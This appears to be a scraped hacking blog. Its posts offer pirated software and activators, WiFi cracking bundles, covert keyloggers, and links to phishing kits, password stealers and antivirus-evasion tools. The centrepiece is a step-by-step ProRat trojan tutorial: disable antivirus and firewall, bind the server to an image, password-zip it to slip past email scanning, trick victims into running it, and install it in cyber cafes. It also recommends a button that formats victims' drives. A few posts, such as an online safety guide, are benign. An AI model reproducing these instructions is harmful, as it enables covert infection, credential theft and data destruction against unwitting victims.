8:04 AM

Hack Facebook | Hackers Can Delete Facebook Friends: Latest Flaw


A bug in Facebook's Web site lets hackers delete Facebook friends without permission.

The flaw was reported Wednesday by Steven Abbagnaro, a student at Marist College in Poughkeepsie, New York. But as of Friday morning, Pacific time, it had still not been patched, based on tests conducted by the IDG News Service on a reporter's Facebook friends list.

A malicious hacker could combine an exploit for this bug with spam or even a self-copying worm code to wreak havoc on the social network, Abbagnaro said in an interview.

He's written proof-of-concept code that scrapes publicly available data from users'Facebook pages and then, one by one, deletes all of their friends. For the attack to work, however, the victim would first have to be tricked into clicking on a malicious link while logged into Facebook. "The next thing you know, you have no friends," Abbagnaro said.

The security researcher is not going to release the code used in his attack until afterFacebook fixes the flaw, but he says that technically competent hackers could figure out how to pull off the attack.

That's because Abbagnaro's code exploits the same underlying flaw that was first reported by M.J. Keith, a senior security analyst with Alert Logic.

Last week, Keith discovered that Facebook's Web site was not properly checking code sent by users' browsers to ensure that they were authorized to make changes on the site.

Called a cross-site request forgery bug, the flaw is a common Web programming error, but Facebook has had a hard time eradicating it from the site. After Keith first reported the issue, Facebook thought it had fixed the problem, only to discover that it could still be exploited to make users "like" Facebook pages without their consent.

Similarly, Facebook appears to have missed Abbagnaro's delete-friend vector as well.

"I am just blown away that this keeps happening," Keith said in an e-mail interview.

Facebook representatives couldn't immediately be reached for comment.

Facebook's security team has been under siege lately, with worm attacks and site flaws popping up on a regular basis. These security issues come as the social network has been hit with intense criticism for not adequately protecting users' privacy, and inappropriately sharing user data with advertisers.

Users have been quitting the social network and a campaign proclaiming May 31 as Quit Facebook Day has gained some traction.

Despite all of its other problems, Facebook should have fixed this latest flaw by now, Abbagnaro said. "I'm not sure why they haven't fixed it yet because it is pretty serious."

1:32 AM

Download Window 7 Genuine Tool – VIP TOOL

Window 7 Genuine Tool | 6MB
The program can active all Windows 7 Versions!

1:25 AM

Youtube Video Downloader: Youtube Kry 5.2.3 Best Youtube Video Downloader | 7.76 Mb


Youtube Kry 5.2.3 Beste Youtube Video Downloader Fast Download

1:19 AM

Download Free Collection WiFi Hack 2010 | Wireless Hacking Tools and Softwares

This time we bring you the best software to hack the WiFi networks 2010. The compilation includes powerful encryption software in network detection and ideal for hacking WiFi networks.Download Programs to hack Free Full WiFi networks.

This AiO contains:

Windows Tools 1
  1. WiresHark
  2. AirSnare
  3. WirelessKeyView
  4. Wifi Monster
  5. NetStumbler
  6. Easy Wifi Radar
  7. SmartSniff
  8. Ettercap
  9. WinPcap
  10. CommView
Windows Tools 2
  1. Nmap
  2. Wirelessmon
  3. PocketWarrior
  4. Inssider
  5. RemoteAnyWhere
  6. PmoniPacketMon
  7. ApTools
  8. WiFiFoFum
  9. Advanced Port Scanner
  10. NetSurveyor
Backtrack
  1. Download link for BackTrack 4 Pre Release
  2. Download link for BackTrack 4 Beta Release
  3. Download link for BackTrack 3 VmWare Image
  4. Download link for BackTrack 3
  5. Download link for BackTrack 3 USB Version

PDF's & Tutorials
  1. Hacking Wireless Networks
  2. Cracking WEP and WPA WiFi
  3. Wifi Hacking
  4. Hacking Asus WL520gU
  5. BackTrack PDFs
  6. WiFi Advanced Fuzzing
  7. Wifi Security
  8. Wireless Sniffing WiresHark
  9. Wireless Hacking Tools
Bonus Software
  1. Net Tools
  2. WepGen
  3. Cantennator
  4. Anchorfree
  5. Cain and Abel
  6. Wifi Drivers
  7. Brutus
  8. VmWare Keygen
  9. LanHelper
Download Hotfile 1

http://hotfile.com/dl/36202187/8f7ef67/AIO_Wifi_Hack_2010.part1.rar.html
http://hotfile.com/dl/36202234/9ac6ed2/AIO_Wifi_Hack_2010.part2.rar.html

Download Hotfile 2

http://hotfile.com/dl/28103335/b46696b/AIO_Wifi_Hack_2010.part1.rar.html
http://hotfile.com/dl/28098164/27dbf61/AIO_Wifi_Hack_2010.part2.rar.html

Download Rapidshare 3

1:16 AM

Download Google Operating System 2010 (Android LiveCD - No Instalation) | 179 MB

Google Operating System 2010 (Android LiveCD - No Instalation) | 179 MB

LiveAndroid lets you download a disk image LiveCD operating system Google Android. Just record the image on the disc, placing it in the CD-ROM drive and restart your computer and you can test Android, without installing it and not touching any files on your computer.
Checksums :
MD5 E0C5C305F78CD958DBAEA3716C82296F
SHA-1 741B42748666AC085FC12692AC6AFB369B002A2E
CRC32 EEDBFF00
Language: English

http://hotfile.com/dl/43656832/3176fe1/liveandroid.part1.rar.html
http://hotfile.com/dl/43656859/0258fc4/liveandroid.part2.rar.html

1:13 AM

Download Keyloggers Full Version Free


Award Keylogger is fast, invisible and easy-to-use surveillance tool that allows you to find out what other users do on your computer in your absence. It records every keystroke to a log file.

The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.
Info: http://www.award-soft.com

Ardamax Keylogger v2.9 [With Working Serial Included]

Ardamax Keylogger is a useful keylogger that will record users activity and will save it to a logfile. It's very easy to use.

The logfile can be viewed as a text or web page. Use this tool to find out what is happening on your computer while your away, maintain a backup of your typed data automatically or use it to monitor your kids.

1:08 AM

Download Best Free Hacking Tools & Softwares: Download Trojans, Keyloggers, Wireless Hacks, Mobile Hacks & Crackers | BEST COLLECTION


















9:29 AM

Download Freeware Keylogger Full Version

Free Keylogger monitors computer activities.

Freeware Keylogger is a completely free award winning monitoring application. It runs in the background and allows you to monitor all keyboard activities performed on your PC, visited websites, e-mail, chat, openned application and files. Freeware Keylogger helps you to find out, what exactly took place in the system. You will find out what your employee or children search in the internet, and to check them. You will be able to view the reports as HTML files. The software is 100% Free application.
Download Freeware Keylogger

9:23 AM

How to hack email, yahoo, orkut, myspace and gmail account passwords. Download free email password hacking software. List of Underground hacking sites

Readers, the below is basically not related to security. I have received huge number or emails from readers of this blog regarding all such script kiddie tools and softwares. Every thing already available on net free of cost so I have not seen any harm in sharing of all these links. USE IT AT YOUR OWN RISK.

I have found below cited blogs/sites/forums related to hacking and cracking, which I would like to share. These blogs contains all stuff like how to hack email account password, How to create a Phishing page and how to hack gmail, orkut, myspace, facebook, twitter and many other websites account passwords. I have also mentioned few of links from www.freehacking.net itself.

You can also get the free password hacking softwares to download. Be careful before downloading. I am mentioning those website links here does not mean I have tested all those tools. I am taking no responsibility of those Techniques tools and softwares. All the softwares detected as Trojan and virus by antivirus, so you have to use it on some system which is not having any antivirus. Also don't use you real email id password while doing testing. Create a fake account first and use it.

* List of all underground hacking websites: Hacker Top Sites. To visit click here

* Download free Anonymous mailer software, Send anonymous email. DOWNLOAD HERE

Password for rar file is: techotips.blogspot.com
To know how it works, visit here

* Gmail account password hacking software. Click here to download

Password for rar file is: techotips.blogspot.com
To know how it works, visit here

* Learn how to create a fake page OR Phishing page for yahoo, gmail, orkut and other sites. Download the Phisher creator software here.

Password for rar file is: techotips.blogspot.com
To know how it works, visit here

* How does an attacker installed any trojan on the victim's computer? How to bypass antivirus ? Answer: Using Wrappers. To know more click here

* Which are various back doors, Trojans and Key loggers available and how they work? To Get a complete guide regarding all famous back doors...click here

* How you can spread you Trojan, virus OR keylogger on network or internet ? To know which all are various modes of transmission..CLICK HERE

* How many different types of trojans, backdoors and keyloggers are available on internet.. To know CLICK HERE

* To know working of trojan OR how trojan works..CLICK HERE

* How to Hack Gmail Account Passwords Using Phishing Attack..CLICK HERE TO HACK GMAIL

* How to Hack Facebook Account Passwords Using Phishing Attack..CLICK HERE TO HACK FACEBOOK

* How to Hack Twitterl Account Passwords Using Phishing Attack..CLICK HERE TO HACK TWITTER

* How to hack facebook using Facebook Freezer. To download the software CLICK HERE

* A very good source to download free Keyloggers, Trojans and password stealer's. CLICK HERE

9:02 AM

Microsoft Office 2010 Free Download: 2010 Microsoft Office

MICROSOFT OFFICE 2010 SELECT EDITION RTM VOLUME X86 DVD ENGLISH-WZT

BUILD: 14.0.4763.1000
FILE: 14.0.4763.1000_Select_volume_ship_x86_en-us_dvd.iso
SIZE: 3,490,926,592 byte
SHA1: 92F9B3BD1029A1FF524B8A2BD8EF4F7E5C304F5B
MD5: 78E007959180C6B8CFE840F1D9312A42
CRC: 1EA98A3F

FILE: mini-KMS_Activator_v1.051.exe
SIZE: 1,070,607 byte
CRC32: E06B74F6
MD5: A0E4F5BCD5AFC8B891CAFCACCEC37364
SHA-1: AFD54D5FD061171C398DCD2B4CD937DC1E99A1B7

The activator is based on ZWT KMS-Keygen.

KMS-Keygen is installed as Windows Service, not too much memory used, around 2 mb of RAM. Code generated by KMS-Keygen is not always valid, that’s why sometimes activation may fail. In this case just repeat activation request. This is KMS-Keygen problem, but not the the activator fault.

Activator works on 32 and 64 edition of Office 2010 and Windows 6.0 or newer.

Activator has following functions:

- Activation of Office 2010 VL products
- Activation status check of Office 2010 products
- Trial reset for all Office 2010 products and Windows 6.0 or newer
- Entering of KMS-Client keys for all Windows VL editions
- Activation of Windows 6.0+ VL products
- Activation status check of Windows 6.0+ products

8:39 AM

Download Norton Internet Security 2010 17.0 - 98Mb

Norton Internet Security was designed to be the fastest virus, spyware and internet protection you can buy. The Norton Internet Security main window acts as a security management interface.

Norton Internet Security 2010 will be the fastest and lightest security suite Symantec has ever delivered. It guards your PC, network, online activities and your identity with innovative, intelligent detection technologies optimized to combat today’s aggressive, rapid-fire attacks. Improved Norton Safe Web technology blocks Internet threats before they can infect your PC.

So you can browse, buy and bank online with confidence. It even warns you of unsafe web sites right in your search results. Plus, unlike other Internet security suites, it provides easy-to-understand threat and performance information to help you avoid future threats and keep your PC running fast.

Here are some key features of "Norton Internet Security":

Engineered for Speed:
• Proven fastest and lightest security suite available
• Intelligence-driven Norton Insight technology targets only those files at risk for faster, fewer, shorter scans
• Installs in under one minute on average requires less than 7 MB of memory
• Up-to-the-minute Protection
• Delivers up-to-the-minute protection with rapid pulse updates every 5 to 15 minutes.
• The Norton Protection System provides multilayered protection technologies that work in concert to stop threats before they impact you.
• Real-time SONAR (Symantec Online Network for Advanced Response) helps prevent bots from taking control of your PC.
• Prevents threats from entering through your firewall.
• Detects and automatically removes online threats.
• Defends against Web-based attacks with patent-pending technology.
• Recovery Tool boots and repairs badly infected PCs
• Delivers our most complete deep-cleaning scan possible.
• Prevents bots from taking control of your PC.
• Norton Ongoing Protection provides continuous protection updates and new product features as they become available throughout your product subscription period, helping to keep your computer protected against the latest Internet threats and risks.
• Norton Automatic Renewal Service helps to ensure that you’re protected by automatically renewing your product subscription before it expires.
Norton Identity Safe:
• Keeps your online identity safer than ever when you buy, bank, browse, and game online.
• Advanced phishing protection keeps your personal identification out of the hands of fraudulent Web sites.
• Stores and encrypts your passwords and other confidential data.
• Fills in online forms at your request to save time and protect you from keystroke loggers.
Control without disruptions:
• Puts every element of your security at your fingertips
• NEW! Schedules resource intensive tasks for when you’re not using your PC.
• Review the security status of every process on your PC.
• Silent mode suspends alerts and updates to avoid interrupting or slowing games and movies.
• Smart two-way firewall automatically makes security decisions for you.
Secure Networking:
• Helps you secure your home network.
• Conceals and secures your PC on public Wi-Fi networks.
Parental Controls:
• Create individual user profiles with enhanced parental controls.
Spam Blocking:
• Filters spam better than ever.
What's New in This Release:
• New and Improved Features
• Performance Enhancements
• The 2010 products improve on the very high performance bar already set by the 2009 products. The Beta builds will be regularly updated, with later builds improving on performance and functionality.
• Enhanced Norton Insight
• Norton Insight is built on the Symantec Quorum backend intelligence technology first introduced in the 2009 products. In 2009 Norton Insight only quantified trustworthiness, in 2010 Norton Insight also provides information on prevalence, age, and runtime performance data.
• Download Insight
• Download Insight is a new line of defense against the introduction of untrusted applications on your system. Download Insight monitors new application or installer downloads, automatically analyzes and classifies the application using the Quorum technology, and provides you with a trust rating for the application before allowing the application or installer to execute.
• Performance Monitoring
• The system performance ...

Download Here

9:28 AM

MUNSHI PREM CHAND ( ALL COLLECTION )



CLICK HERE TO DOWNLOAD ALL THE BOOKS AND STORIES IN HINDI BY MUNSHI PREM CHAND

6:12 AM

Website Hacking Tutorials & Techniques: How to Hack Websites Database & Webservers

Friends, I am posting website hacking tutorials & Techniques from last 2 years. I am receiving a lot of mail from new readers regarding similar tutorials. Here I am indexing all good posts related to Website Hacking. Hope you like this collection. Pls comment if you like.














6:04 AM

Facebook Password Hacking Software: Download Trojans & Keyloggers

How to Hack Facebook Account Passwords Using Trojans & Keyloggers

Here I am demonstrating using PRORAT trojan. You can also check the list of trojans & Keyloggers here which I have already posted few months back. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. I strictly recommend you to try these trojans & keyloggerson some testing system first.

Step-1: Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

STEP-2: Creating the ProRat server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


STEP-3: Open Notifications. Select second option "Mail Notification". In the E-MAIL field you will see a mail
id: bomberman@yahoo.com. Remove this mail ID and give your own mail id here. You will receive a notification
email on this email id whenever you victim will be connected to internet from the infected system.

STEP-4: Open General settings. This tab is the most important tab. In the check boxes. here is a quick overview
of what they mean and which should be checked.

Key:

[ ] = dont check
[x] = check

[ ] Give a Fake Error Message. (when they open the file, it gives an error message.
[x] Melt server on install. (this will cause the server to ALWAYS connect to the internet when the victim gets
online)
[x] Kill AV - FW on Install. (this causes the anti-virus and firewalls to SHUT DOWN and stay off once installed
on the victim's computer.
[x] Disable Windows XP SP2 security center
[x] Disable Windows XP Firewall
[x] Clear Windows XP Restore Points
[ ] Dont send LAN notifications ( keeps other computers on the victim's network from knowing about you )
[ ] Protection for removing local server

In the Invisibility Box, check all 4 boxes.

STEP-5: Open Bind With File. You can bind your server\downloader server with a file that you want. You must
click on the ''Bind the server with a file'' button and then the file button will be activated. You can choose
a file to be binded with the server now. A good suggestion is a picture because that is a small file and its
easer to send to the people you need.

STEP-6: Open Server Extensions. I prefer using .exe files, because it is cryptable. Mostly crypters don't
support .bat/.pif/.com etc. So use .exe files.

STEP-7: Open Server Icon. You can select the one you want to use with the server from the small pictures on the
menu. You can use an icon from your computer also. Press the "Choose new icon" button.

STEP-8: After this, press "Create server", your server will be in the same folder as ProRat. A new file with
name "binded_server" will be created. Rename this file to something describing the picture.

[NOTE: PLS DO NOT OPEN THE FILE "binded_server" on your system.]

STEP-9: Sending this file "binded_server" to victim. You can send this trojan server via email, pendrive or if
you have physical access to the system, go and run the file.

From EMAIL, you can not send this file as it is because it will be detected as TROJAN OR VIRUS. Password protect this file with
ZIP and then email it. Once your victime download this ZIP file, ask him to unlock it using ZIP password. When
the victim will double click on the file, he will be in your control.

STEP-10: Connecting to the victim's computer. Once the server has been sent and the person has opened this ZIP
folder, they will now be infected with it. AND HAVE NO CLUE ABOUT IT!. On the top of the ProRat program you
will see a box in the upper left corner. Type in the victim's IP address and make sure the port is 5110. Now
press Connect. You should now see a pop-up box wanting to know a password. Remember the password you entered
while creating the server? that is what you need to type. By default, it is "123456" without quotes.

STEP-11: Check your email, (junk in needed), and find the “Your victim is online”. Copy and paste the IP
address onto ProRat where it says “IP:[127.0.0.1]“. Press CONNECT, DO NOT CHANGE THE PORT, if u did change it
back to 5110. Type in the password (default is usually 123456, it is in the email). Your done, now you can mess
with the buttons on the program. Especially the GIVE DAMAGE button. It will damage their pc by format, and will
make the computer useless.

Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

FAQ:

Q: Error message:Windows cannot access the specified deice, path, or file. You may not have the appropriate
permissions to access the item. What do I do?
A: Simple! Delete the ProRat program. Delete it. What happen was, your AV has altered the file. OR it could be m
alacious content. Either way, delete it. NEXT, remember the file you downladed? Un extract the file again and
re run. You will not need to remake a server file and such if it has been sent to the victim. Just open ProRat
and make sure your AV is shut off. Reconnect. There ya go.

Q: What operating systems are supported by ProRat?
A: Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista

Q: When I have downloaded ProRat, my antivirus detect it as virus. What should I do?
A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, ProRat is detected as virus
also. To download and install ProRat you will need to turn off your anti-virus.

Q: What should I do after I install my server?
A: After you install your server, you should spread it. Few years back I have installed my server manually on
1000's of cyber cafe in my city. I hacked almost the entire city cafe users secret information. This is the
best way. Go to nearest cyber cafe's and manually install your trojan server.

Q: I've created a server, but I don't see it in the directory. Why?
A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove your
antivirus if you are going to use RATs.

Q: I've send my server to a friend on MSN, but he doesn't connect.
A: That's because he has an antivirus or firewall and it won't let him to connect in your RAT. To make it
FUD(Fully Undetectable), you should use a crypter.

Q: Is ProRat illegal?
A: No. ProRat is a legal RAT. The author of ProRat created his program for legitimate purposes. For example,
there are many legal activities. Parents can use keyloggers to protect their children from online abuse etc.
Some people use it for stealing passwords, credit cards and more but it's not a software which breaks the law,
but the person who uses it.

Q: Can ProRat be used for legitimate purposes?
A: Yes. You can monitor your children online activity.. to make sure they don't visit pornographic websites.
You can find out if someone uses your computer while you are away, ensure no one is accessing your personal
files while you are away and more.

Q: How do I make my server FUD?
A: You should use a binder or crypter. Also check the below links how to make trojan or keylogger fully undetectable from antivirus.
THIS TUTORIAL HAS BEEN CREATED WITH THE HELP OF AN UNDERGROUND HACKER flAmingw0rm.

5:58 AM

How to bypass a Keylogger: How to fool a Keylogger

These days Agents spy on u everywhere, in college, at work, maybe a trojan virus on your home PC which keylogs your paswords and mails it to someone else. If u think u r being logged, try this:

Whenever u have to type a password, never type the complete password in one go, ie, if your password is WINDOWS, u should type NDOW, then move cursor to start of the password field using the mouse ONLY, then type WI, then move cursor to end using the mouse and type S. This way the logger will record your keystrokes as ndowwis instead of WINDOWS.

Additionally you can also use spaces with you passwords as spaces are not readable. Use 2-3 spaces after or in the end (as prefix) for all your passwords. Gmail, yahoo and so many other services supports spaces in password field.

5:54 AM

How to hack email, yahoo, orkut, myspace and gmail account passwords. Download free email password hacking software. List of Underground hacking sites

Readers, the below is basically not related to security. I have received huge number or emails from readers of this blog regarding all such script kiddie tools and softwares. Every thing already available on net free of cost so I have not seen any harm in sharing of all these links. USE IT AT YOUR OWN RISK.

I have found below cited blogs/sites/forums related to hacking and cracking, which I would like to share. These blogs contains all stuff like how to hack email account password, How to create a Phishing page and how to hack gmail, orkut, myspace, facebook, twitter and many other websites account passwords. I have also mentioned few of links from www.freehacking.net itself.

You can also get the free password hacking softwares to download. Be careful before downloading. I am mentioning those website links here does not mean I have tested all those tools. I am taking no responsibility of those Techniques tools and softwares. All the softwares detected as Trojan and virus by antivirus, so you have to use it on some system which is not having any antivirus. Also don't use you real email id password while doing testing. Create a fake account first and use it.

  • Download free Anonymous mailer software, Send anonymous email. DOWNLOAD HERE
Password for rar file is: techotips.blogspot.com
To know how it works, visit here
Password for rar file is: techotips.blogspot.com
To know how it works, visit here

Password for rar file is: techotips.blogspot.com
To know how it works, visit here

  • How does an attacker installed any trojan on the victim's computer? How to bypass antivirus ? Answer: Using Wrappers. To know more click here
  • Which are various back doors, Trojans and Key loggers available and how they work? To Get a complete guide regarding all famous back doors...click here
  • How you can spread you Trojan, virus OR keylogger on network or internet ? To know which all are various modes of transmission..CLICK HERE
  • How many different types of trojans, backdoors and keyloggers are available on internet.. To know CLICK HERE
  • To know working of trojan OR how trojan works..CLICK HERE
  • How to hack facebook using Facebook Freezer. To download the software CLICK HERE
  • A very good source to download free Keyloggers, Trojans and password stealer's. CLICK HERE

5:53 AM

Basic Online Security Guide: Follow to increase protection from online threats

As the rise in popularity and use of the internet increases, the more sophisticated the attacks on the users by those stealing identities, spreading viruses, or simply monitoring the user for monetary gain. It is easy to get a virus and it is easy to have your credit card number stolen, but you can take steps to prevent these things from happening to you. The following is a simple guide that anyone can follow to increase protection from these threats.

1. Keep the operating system updated. Make sure your system is set to update automatically, so that critical services are patched when security flaws are found. Hackers and malware in general take advantage of flaws in system software to infiltrate and install onto the system. Keeping the system up to date is the first step in computer security.

2. Keep all security software updated. Make sure your anti-virus and antispyware solutions are the latest versions and that they are set to download signatures on a regular basis. Malware authors constantly change tactics and use different techniques to avoid being detected. As malware change the solutions also have to change in order to detect them. Keeping your security software updated can increase your chance of detecting a vulnerability.

3. Use a safe web browser and keep it updated. Because of its popularity, Internet Explorer is the most targeted browser for malware authors. The flaws in the browser that allow access to the computer are well known and traded amongst hackers world wide. Switching to another web browser will greatly reduce your chance of getting infected with spyware or a virus.

4. Use caution visiting unpopular sites. Not so well known sites are sometimes embedded with malware designed to infiltrate your system. Don’t click on everything at a site that is new to you. Read everything carefully and if anything looks suspicious then leave. The internet is large and there are plenty of places to get the information you seek. It is always a good idea to stick with sites you are familiar with.

5. Use caution clicking on links sent to you. Just because someone emailed you a link doesn’t
mean you have to click on it. Make sure you know the person who sent the link and that there is a description of the link in the email. Email is one of the most common forms of spreading a virus.

6. Use caution clicking on links in discussion forums. Forums and chat rooms are a wonderful place to make new friends, but these social outlets are magnets for people wanting to do harm. Forums can attract thousands of people a day and hundreds of people can be attacked all at once by just one simple malicious post. Make sure you are familiar with the handle of the person posting a link.

7. Download software from the original vendor. It is quite common for malware authors to bundle their wares with legitimate software and offer it for download on their site. To be safe you can do a search for the company that made the software and download it from that site. It is not only safer but a lot of times you get the latest version of the software.

8. Check links before logging on to do banking related activities. A common technique thieves use to get your credentials is to claim your password needs changed at an online banking service. Look carefully at the link and you will see that it is not the same as the link you usually use to login. These links sometimes start with numbers, or maybe they will just change one letter thinking you will not notice. To be safe, only use the link that your banking service gave you to do any banking or changing of passwords.

5:50 AM

Detailed Courses of Study to Learn Hacking

•Techniques: Windows Hacking, Registries Editing, Password cracks, Google hacking, Computer Forensics, Firewalls, Network Hacking, Security tools, Hacking tools, Encryption, Email tracking, Router Hacking, Email Forging, Port Scanning, MAC Address Spoofing, Proxies etc.

•Tools: Key loggers, Anti Key Loggers, Firewalls, MAC Address Spoofing, Proxy Bouncing tools, Network Scanners like IPscan, Sniffers, Spyware and Trojan Detectors, Information Gathering Tools, Remote Administration Tools, Computer Forensics Tools, Steganography tools and a lot more.

Games: Hacking Simulation Games to understand the world of hacking and provides you with the opportunity to practice hacking without the danger of getting caught

10 Commandments of Ethical Hacking

1. Don’t a computer to harm other people.
2. Don’t interfere with other people’s computer work.
3. Don’t snoop around in other people’s computer files.
4. Don’t use a computer to steal.
5. Don’t use a computer to bear false witness.
6. Don’t copy or use proprietary software for which you have not paid.
7. Don’t use other people’s computer resources without authorization or compensation.
8. Don’t appropriate other people’s intellectual output.
9. Think about the social consequences of the program you are writing.
10. Always use a computer in ways that insure consideration and respect for your fellow humans.

5:48 AM

How to Trace IP Address Location From Email, Gmail, Hotmail, MSN & Yahoo Mail

Try this technology blog........(vry useful indeed)

We will explain how you can track your friends IP address. You will need to do some social engineering in this trick. You will need to ask your friend to mail you something or send him some mail to which he will reply.

Now there can be two scenarios. Your friends/victims IP can be static or dynamic.

Scenario 1: Static IP

Static IP is assigned by the ISP to a specific user, that is, you have one unique IP whenever you log on to the internet. In this case, here's how you can find the IP. We will consider three major email services, viz. gmail, yahoo and hotmail.

Gmail:

Open the mail you have recieved from your friend and click on the down arrow to the right of the reply button. Now click on Show Original.
You will get to see the complete headers of the mail from which you have to find the IP from which this mail was sent. Mostly in case of a static IP, the IP is shown as in the figure

Hotmail:

Right click on the recieved mail and select 'view message source'


You will get the complete message with source. This is how the originating IP looks in hotmail
Yahoo:

Open the mail and at the right bottom of the mail, click on 'Full headers'

Again over here you will get to see the IP in the same format as in hotmail and gmail, shown above.

Scenario 2: Dynamic IP

In case of dynamic IP, hotmail and yahoo wont help much. Whereas Gmail shows the private IP of the sender. Just follow the procedure above as shown for static. On the source page you have to look for the following:



Here the IP 10.141.12.9 is the private IP of our victim. This is how you can get IP information of victims behind subnets. Well sometimes the private is not shown by any of the email services because instead of sending detailed email information a DKIM-signature is sent for authentication.

There are other numerous ways using which we can track our victims IP. Will soon be posting on that. Stay subscribed. Till then..

Happy Tracking!!!


5:42 AM

How to Recover Password for Gmail & Google Talk : Hack Gmail & Google Talk Account Passwords if you have physical access to victim's computer

Password Recovery for Google is a tool that will search your PC for encrypted Gmail passwords, extract them, decrypt and decode them and display them in a readable format. The following locations are known to store Gmail passwords: Google Talk, Gmail Notifier, Google Desktop, Picasa, Google Photos Screensaver, Internet Explorer and Mozilla Firefox. This cracking tool will work provided the password you are trying to recover is saved on your local PC under the current login and you are able to login automatically without entering your password.


To hack Gmail using fake page or by phishing attack click here
  • Reveal Google Talk password
  • Decode Google Talk passwords
  • Google Talk password restore
  • Show Google Talk password
  • Google Talk password finder
  • Forgot Google Talk password
  • Google Talk password recovery
  • Change Google Talk password
  • See saved Google Talk password
  • Google Talk passwort anzeigen
  • Google Talk password decrypter
  • How to get Google Talk password
  • Google Talk password cracker (only local data is cracked)
  • Retrieve Google Talk password
  • Rip Google Talk password (only local data files are ripped)
  • Google Talk password hacker (is also illegal)
  • Google Talk password stealer (is illegal)

5:39 AM

How to hack email, yahoo, orkut, myspace and gmail account passwords. Download free email password hacking software. List of Underground hacking sites

Readers, the below is basically not related to security. I have received huge number or emails from readers of this blog regarding all such script kiddie tools and softwares. Every thing already available on net free of cost so I have not seen any harm in sharing of all these links. USE IT AT YOUR OWN RISK.

I have found below cited blogs/sites/forums related to hacking and cracking, which I would like to share. These blogs contains all stuff like how to hack email account password, How to create a Phishing page and how to hack gmail, orkut, myspace, facebook, twitter and many other websites account passwords. I have also mentioned few of links from www.freehacking.net itself.

You can also get the free password hacking softwares to download. Be careful before downloading. I am mentioning those website links here does not mean I have tested all those tools. I am taking no responsibility of those Techniques tools and softwares. All the softwares detected as Trojan and virus by antivirus, so you have to use it on some system which is not having any antivirus. Also don't use you real email id password while doing testing. Create a fake account first and use it.

  • Download free Anonymous mailer software, Send anonymous email. DOWNLOAD HERE
Password for rar file is: techotips.blogspot.com
To know how it works, visit here
Password for rar file is: techotips.blogspot.com
To know how it works, visit here

Password for rar file is: techotips.blogspot.com
To know how it works, visit here

  • How does an attacker installed any trojan on the victim's computer? How to bypass antivirus ? Answer: Using Wrappers. To know more click here
  • Which are various back doors, Trojans and Key loggers available and how they work? To Get a complete guide regarding all famous back doors...click here
  • How you can spread you Trojan, virus OR keylogger on network or internet ? To know which all are various modes of transmission..CLICK HERE
  • How many different types of trojans, backdoors and keyloggers are available on internet.. To know CLICK HERE
  • To know working of trojan OR how trojan works..CLICK HERE
  • How to hack facebook using Facebook Freezer. To download the software CLICK HERE
  • A very good source to download free Keyloggers, Trojans and password stealer's. CLICK HERE

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want me to post similar articles, Pls give me a feedback and leave a comment here.